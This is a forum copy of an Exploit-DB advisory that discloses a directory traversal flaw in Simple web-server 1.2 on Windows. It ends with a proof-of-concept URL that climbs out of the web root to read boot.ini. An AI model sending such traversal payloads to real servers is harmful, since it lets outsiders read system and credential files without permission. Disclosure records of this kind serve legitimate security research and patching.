- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 17381
- Проверка EDB
-
- Пройдено
- Автор
- AUTOSEC TOOLS
- Тип уязвимости
- REMOTE
- Платформа
- WINDOWS
- CVE
- null
- Дата публикации
- 2011-06-10
Код:
------------------------------------------------------------------------
Software................Simple web-server 1.2
Vulnerability...........Directory Traversal
Threat Level............Serious (3/5)
Download................http://www.storecalc.com
Discovery Date..........6/1/2011
Tested On...............Windows XP SP3 EN
------------------------------------------------------------------------
Author..................AutoSec Tools
Site....................http://www.autosectools.com/
Email...................John Leitch <[email protected]>
------------------------------------------------------------------------
--Description--
A directory traversal vulnerability in Simple web-server 1.2 can be
exploited to read files outside of the web root.
--PoC--
http://localhost/%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../boot.ini- Источник
- www.exploit-db.com
